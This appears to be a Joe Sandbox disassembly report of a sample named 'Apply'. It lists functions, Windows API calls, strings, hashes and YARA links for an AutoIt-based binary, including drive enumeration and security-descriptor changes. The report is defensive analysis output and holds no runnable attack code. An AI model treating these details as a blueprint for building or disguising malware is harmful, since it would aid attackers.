CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D352F
GlobalFree.KERNEL32(00000000), ref: 008D353A
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D354C
OleLoadPicture.OLEAUT32(?,00000000,00000000,008F0C20,00000000), ref: 008D3562
GlobalFree.KERNEL32(00000000), ref: 008D3572
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 008D3598
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 008D35B7
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D35D9
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008D37C6

Strings

AutoIt v3, xrefs: 008D3479
DISPLAY, xrefs: 008D3629
static, xrefs: 008D34C1, 008D3618
, xrefs: 008D374C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a587b2d197d4fa53febca3fe2e0cfb02805057e952e622434038d347b0a59f97
Instruction ID: adec8aa93722786f402621a3ff833467caea67c9278a01c69a7dcdc7565b35ef
Opcode Fuzzy Hash: a587b2d197d4fa53febca3fe2e0cfb02805057e952e622434038d347b0a59f97
Instruction Fuzzy Hash: 90026B71900208AFDB14DF64DD89EAE7BB9FB48710F048259F915EB2A0DB74AD05CB61

Function 008E77A0 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 008E77FA
GetSysColorBrush.USER32(0000000F), ref: 008E782B
GetSysColor.USER32(0000000F), ref: 008E7837
SetBkColor.GDI32(?,000000FF), ref: 008E7851
SelectObject.GDI32(?,?), ref: 008E7860
InflateRect.USER32(?,000000FF,000000FF), ref: 008E788B
GetSysColor.USER32(00000010), ref: 008E7893
CreateSolidBrush.GDI32(00000000), ref: 008E789A
FrameRect.USER32(?,?,00000000), ref: 008E78A9
DeleteObject.GDI32(00000000), ref: 008E78B0
InflateRect.USER32(?,000000FE,000000FE), ref: 008E78FB
FillRect.USER32(?,?,?), ref: 008E792D
GetWindowLongW.USER32(?,000000F0), ref: 008E794F

Part of subcall function 008E7AB3: GetSysColor.USER32(00000012), ref: 008E7AEC
Part of subcall function 008E7AB3: SetTextColor.GDI32(?,?), ref: 008E7AF0
Part of subcall function 008E7AB3: GetSysColorBrush.USER32(0000000F), ref: 008E7B06
Part of subcall function 008E7AB3: GetSysColor.USER32(0000000F), ref: 008E7B11
Part of subcall function 008E7AB3: GetSysColor.USER32(00000011), ref: 008E7B2E
Part of subcall function 008E7AB3: CreatePen.GDI32(00000000,00000001,00743C00), ref: 008E7B3C
Part of subcall function 008E7AB3: SelectObject.GDI32(?,00000000), ref: 008E7B4D
Part of subcall function 008E7AB3: SetBkColor.GDI32(?,00000000), ref: 008E7B56
Part of subcall function 008E7AB3: SelectObject.GDI32(?,?), ref: 008E7B63
Part of subcall function 008E7AB3: InflateRect.USER32(?,000000FF,000000FF), ref: 008E7B82
Part of subcall function 008E7AB3: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008E7B99
Part of subcall function 008E7AB3: GetWindowLongW.USER32(00000000,000000F0), ref: 008E7BA6

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 1a9042a0b7b4c76ebf5e1b576154ca7642b922e296d136eec66598ba91db79e3
Instruction ID: 9618df7cefd56add0e28dd20bd87fdbbdb79c8cda91701c415199f58e2f9cc15
Opcode Fuzzy Hash: 1a9042a0b7b4c76ebf5e1b576154ca7642b922e296d136eec66598ba91db79e3
Instruction Fuzzy Hash: B8A19D72008391FFD7009F64DC88A6BBBA9FF49324F100A29FA62DA1E1D775D948DB51

Function 008690AA Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00869139
SendMessageW.USER32(?,00001308,?,00000000), ref: 008A716B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008A71A4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008A75E9

Part of subcall function 00869287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00868F0D,?,00000000,?,?,?,?,00868EDF,00000000,?), ref: 008692EA

SendMessageW.USER32(?,00001053), ref: 008A7625
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008A763C
ImageList_Destroy.COMCTL32(00000000,?), ref: 008A7652
ImageList_Destroy.COMCTL32(00000000,?), ref: 008A765D

Strings

0, xrefs: 008A7475

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: cf1a3367d0cd9d54fe07d7b2e1866392d774a71ecda3866043ae7df3fcd3f587
Instruction ID: 247e7e21aac29c67cf71ca7eacede54df85334ddea8cf7701181d66302478e5f
Opcode Fuzzy Hash: cf1a3367d0cd9d54fe07d7b2e1866392d774a71ecda3866043ae7df3fcd3f587
Instruction Fuzzy Hash: 1312D134608242EFEB25CF18CC88BA5B7F5FB46314F254469F495CB6A1C731E886EB91

Function 008D2E98 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 008D2EC5
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008D2FF1
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008D3030
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008D3040
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 008D3087
GetClientRect.USER32(00000000,?), ref: 008D3093
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 008D30DC
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008D30EB
GetStockObject.GDI32(00000011), ref: 008D30FB
SelectObject.GDI32(00000000,00000000), ref: 008D30FF
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 008D310F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008D3118
DeleteDC.GDI32(00000000), ref: 008D3121
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008D314D
SendMessageW.USER32(00000030,00000000,00000001), ref: 008D3164
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 008D31A4
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008D31B8
SendMessageW.USER32(00000404,00000001,00000000), ref: 008D31C9
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 008D31FE
GetStockObject.GDI32(00000011), ref: 008D3209
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008D3214
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 008D321E

Strings

msctls_progress32, xrefs: 008D319A
AutoIt v3, xrefs: 008D307F
DISPLAY, xrefs: 008D30E1
static, xrefs: 008D30D6, 008D31F8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: b16e98cc8f0e8000c23c92a94e7800e37dd7d922c69460817b3b259b5e1e8c75
Instruction ID: 47f05f3afe1ba25999487562a9fc0883aa466db5570936233349a9c5d11f4449
Opcode Fuzzy Hash: b16e98cc8f0e8000c23c92a94e7800e37dd7d922c69460817b3b259b5e1e8c75
Instruction Fuzzy Hash: 36B14C71A10205AFDB24DFA8DC86FAE7BB9FB48710F008615F914EB290CB74AD45CB94

Function 008C524E Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008C525C
GetDriveTypeW.KERNEL32(?,008EDB28,?,\\.\,008EDC1C), ref: 008C5339
SetErrorMode.KERNEL32(00000000,008EDB28,?,\\.\,008EDC1C), ref: 008C54A5

Strings

Removable, xrefs: 008C537F, 008C5384
MMC, xrefs: 008C544D
Unknown, xrefs: 008C535C, 008C53F2
USB, xrefs: 008C5423
PhysicalDrive, xrefs: 008C52E5
RAID, xrefs: 008C542A
Fibre, xrefs: 008C541C
SAS, xrefs: 008C5438
iSCSI, xrefs: 008C5431
SATA, xrefs: 008C543F
ATA, xrefs: 008C5407
Network, xrefs: 008C5371
ATAPI, xrefs: 008C5400
CDROM, xrefs: 008C536A
FileBackedVirtual, xrefs: 008C545B
RAMDisk, xrefs: 008C5363
1394, xrefs: 008C540E
SSD, xrefs: 008C53B9
SSA, xrefs: 008C5415
\\.\, xrefs: 008C52AE
Fixed, xrefs: 008C5378
Virtual, xrefs: 008C5454
SCSI, xrefs: 008C53F9

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f05a4b71a478986605ca0f03b27ebda97af079152cb21f4c4759177a2c7ad7a7
Instruction ID: 5b8609e4804039cff7abae2839d9f46bc0900f53d655dd9774bb22d1affbcfa2
Opcode Fuzzy Hash: f05a4b71a478986605ca0f03b27ebda97af079152cb21f4c4759177a2c7ad7a7
Instruction Fuzzy Hash: 5B618EB4704A0D9ACF18DB68C981FA9B7B1FF4530AB248059A406EB391DA71FDC5C746

Function 008E6BE6 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 460windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 008E6C93
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 008E6D4C
SendMessageW.USER32(?,00001102,00000002,?), ref: 008E6D68
GetMenuItemInfoW.USER32(?,00000030,00000000,?), ref: 008E6DB9
SetMenuItemInfoW.USER32(?,00000030,00000000,00000030), ref: 008E6E14
GetMenuItemInfoW.USER32(00000200,00000030,00000000,00000030), ref: 008E6E37
SetMenuDefaultItem.USER32(00000200,?,00000000), ref: 008E6E53
DrawMenuBar.USER32(?), ref: 008E6E5F
SendMessageW.USER32(00000466,00000466,00000000,00000000), ref: 008E6EE1
SendMessageW.USER32(000000F1,000000F1,?,00000000), ref: 008E702F
SendMessageW.USER32(?,00000401,?,00000000), ref: 008E7053
GetFocus.USER32 ref: 008E7059
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?), ref: 008E7114
SendMessageW.USER32(?,00000469,?,00000000), ref: 008E7127
EnableWindow.USER32(00000000,00000000), ref: 008E715E
EnableWindow.USER32(00000001,00000001), ref: 008E717A
ShowWindow.USER32(00000010,00000000), ref: 008E71F0
ShowWindow.USER32(?,00000004), ref: 008E7206
EnableWindow.USER32(?,00000001), ref: 008E721F

Strings

0, xrefs: 008E6DA0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$MessageSend$Menu$Item$EnableInfo$Show$DefaultDrawFocusMove
String ID: 0
API String ID: 1429628313-4108050209
Opcode ID: 4b5d26239616b756fba6ef6f2ec9fbd53ce38ce22006b4dd32479a475def5068
Instruction ID: 4f7f7bdf1a6337683150c76f30fb6dc58b63e61acc2862be46a801132de07eb5
Opcode Fuzzy Hash: 4b5d26239616b756fba6ef6f2ec9fbd53ce38ce22006b4dd32479a475def5068
Instruction Fuzzy Hash: EA02F070108381AFD715CF26CC88BABBBE5FF86354F048918F594CA2A1D734D959DB91

Function 008E7AB3 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 008E7AEC
SetTextColor.GDI32(?,?), ref: 008E7AF0
GetSysColorBrush.USER32(0000000F), ref: 008E7B06
GetSysColor.USER32(0000000F), ref: 008E7B11
CreateSolidBrush.GDI32(?), ref: 008E7B16
GetSysColor.USER32(00000011), ref: 008E7B2E
CreatePen.GDI32(00000000,00000001,00743C00), ref: 008E7B3C
SelectObject.GDI32(?,00000000), ref: 008E7B4D
SetBkColor.GDI32(?,00000000), ref: 008E7B56
SelectObject.GDI32(?,?), ref: 008E7B63
InflateRect.USER32(?,000000FF,000000FF), ref: 008E7B82
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008E7B99
GetWindowLongW.USER32(00000000,000000F0), ref: 008E7BA6
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008E7BF5
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008E7C1F
InflateRect.USER32(?,000000FD,000000FD), ref: 008E7C3D
DrawFocusRect.USER32(?,?), ref: 008E7C48
GetSysColor.USER32(00000011), ref: 008E7C59
SetTextColor.GDI32(?,00000000), ref: 008E7C61
DrawTextW.USER32(?,008E77C0,000000FF,?,00000000), ref: 008E7C73
SelectObject.GDI32(?,?), ref: 008E7C8A
DeleteObject.GDI32(?), ref: 008E7C95
SelectObject.GDI32(?,?), ref: 008E7C9B
DeleteObject.GDI32(?), ref: 008E7CA0
SetTextColor.GDI32(?,?), ref: 008E7CA6
SetBkColor.GDI32(?,?), ref: 008E7CB0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 3458c1437062b77510159e4bbf7468d056945a80a0da6f31371494db51d4d5df
Instruction ID: 69d184f0c2f8693aa3d73a5a5f7e56b9f2430efb0cf60dec4cea8d23a64adaf9
Opcode Fuzzy Hash: 3458c1437062b77510159e4bbf7468d056945a80a0da6f31371494db51d4d5df
Instruction Fuzzy Hash: D5613A72904258EFDB019FA8DC89EEEBBB9FB09320F114125F915AB2A0D7719944DB90

Function 008E17AD Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 008E18E2
GetDesktopWindow.USER32 ref: 008E18F7
GetWindowRect.USER32(00000000), ref: 008E18FE
GetWindowLongW.USER32(?,000000F0), ref: 008E1953
DestroyWindow.USER32(?), ref: 008E1973
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008E19A7
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008E19C5
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008E19D7
SendMessageW.USER32(00000000,00000421,?,?), ref: 008E19EC
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 008E19FF
IsWindowVisible.USER32(00000000), ref: 008E1A5B
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008E1A76
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008E1A8A
GetWindowRect.USER32(00000000,?), ref: 008E1AA2
MonitorFromPoint.USER32(?,?,00000002), ref: 008E1AC8
GetMonitorInfoW.USER32(00000000,?), ref: 008E1AE2
CopyRect.USER32(?,?), ref: 008E1AF9
SendMessageW.USER32(00000000,00000412,00000000), ref: 008E1B64

Strings

0, xrefs: 008E188D
tooltips_class32, xrefs: 008E19A0
(, xrefs: 008E1AD5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 9fad923085d05ed3aff471025263a48d035a19712f3da290cd9cf69efdc47d55
Instruction ID: cf5324bc399b98a1f0b8b2126336c7a09c5f94bc1a93b7db23abda56f803746b
Opcode Fuzzy Hash: 9fad923085d05ed3aff471025263a48d035a19712f3da290cd9cf69efdc47d55
Instruction Fuzzy Hash: BFB1AE71604380AFDB04DF69C889B6BBBE4FF85354F008918F999DB261D731D848CB92

Function 008E09FB Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008E0A9F
_wcslen.LIBCMT ref: 008E0AD9
_wcslen.LIBCMT ref: 008E0B43
_wcslen.LIBCMT ref: 008E0BAB
_wcslen.LIBCMT ref: 008E0C2F
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008E0C7F
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E0CBE

Part of subcall function 0086FD18: _wcslen.LIBCMT ref: 0086FD23

Part of subcall function 008B2921: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008B293A
Part of subcall function 008B2921: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008B296C

Strings

FINDITEM, xrefs: 008E0DE1
GETITEMCOUNT, xrefs: 008E0AD0, 008E0AF1
GETTEXT, xrefs: 008E0BA6, 008E0BC1
GETSELECTED, xrefs: 008E0D9B
SELECTCLEAR, xrefs: 008E0CE7
SELECTINVERT, xrefs: 008E0D38
GETSUBITEMCOUNT, xrefs: 008E0B3E, 008E0B59
SELECTALL, xrefs: 008E0CCF
ISSELECTED, xrefs: 008E0C97
SELECT, xrefs: 008E0D02
GETSELECTEDCOUNT, xrefs: 008E0C2A, 008E0C45
DESELECT, xrefs: 008E0D56
VIEWCHANGE, xrefs: 008E0E2F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: d3c1ed139e1d47664f3a97f1d22bf8bdaec38d6031796e4000fbdf5e1678c428
Instruction ID: 22ad2cf483ba68f549465a608bddc30cc601be52e29cf7b21f7545197e7bd007
Opcode Fuzzy Hash: d3c1ed139e1d47664f3a97f1d22bf8bdaec38d6031796e4000fbdf5e1678c428
Instruction Fuzzy Hash: 4CE1BF312083458BC714DF29C45186AB3E6FF95358B148A6CF896DB3A2DB70ED85CF92

Function 00851456 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085152D
GetSystemMetrics.USER32(00000007), ref: 00851535
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00851560
GetSystemMetrics.USER32(00000008), ref: 00851568
GetSystemMetrics.USER32(00000004), ref: 0085158D
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008515AA
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008515BA
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008515ED
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00851601
GetClientRect.USER32(00000000,000000FF), ref: 0085161F
GetStockObject.GDI32(00000011), ref: 0085163B
SendMessageW.USER32(00000000,00000030,00000000), ref: 00851646

Part of subcall function 0085135A: GetCursorPos.USER32(?), ref: 0085136E
Part of subcall function 0085135A: ScreenToClient.USER32(00000000,?), ref: 0085138B
Part of subcall function 0085135A: GetAsyncKeyState.USER32(00000001), ref: 008513C2
Part of subcall function 0085135A: GetAsyncKeyState.USER32(00000002), ref: 008513DC

SetTimer.USER32(00000000,00000000,00000028,00869421), ref: 0085166D

Strings

AutoIt v3 GUI, xrefs: 008515E5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 55b04b3f546d13d1f7d5f2101d68e77399d3879c91d233f046052d9bc43f181f
Instruction ID: 82842479ce6a89f490dcc0089bf365f767e2ae19b7f6e6c889cd8d3c4f6fac43
Opcode Fuzzy Hash: 55b04b3f546d13d1f7d5f2101d68e77399d3879c91d233f046052d9bc43f181f
Instruction Fuzzy Hash: 31B15B31A00209AFDF14EFA8CC89BAA7BB5FB48315F114219FA15EB290DB74D845CF51

Function 008B146D Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008B17DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008B17F6
Part of subcall function 008B17DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1802
Part of subcall function 008B17DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1811
Part of subcall function 008B17DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,008B127D,?,?,?), ref: 008B1818
Part of subcall function 008B17DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008B182F

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008B14D7
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008B150B
GetLengthSid.ADVAPI32(?), ref: 008B1522
GetAce.ADVAPI32(?,00000000,?), ref: 008B155C
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008B1578
GetLengthSid.ADVAPI32(?), ref: 008B158F
GetProcessHeap.KERNEL32(00000008,00000008), ref: 008B1597
HeapAlloc.KERNEL32(00000000), ref: 008B159E
GetLengthSid.ADVAPI32(?,00000008,?), ref: 008B15BF
CopySid.ADVAPI32(00000000), ref: 008B15C6
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008B15F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008B1617
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008B1629
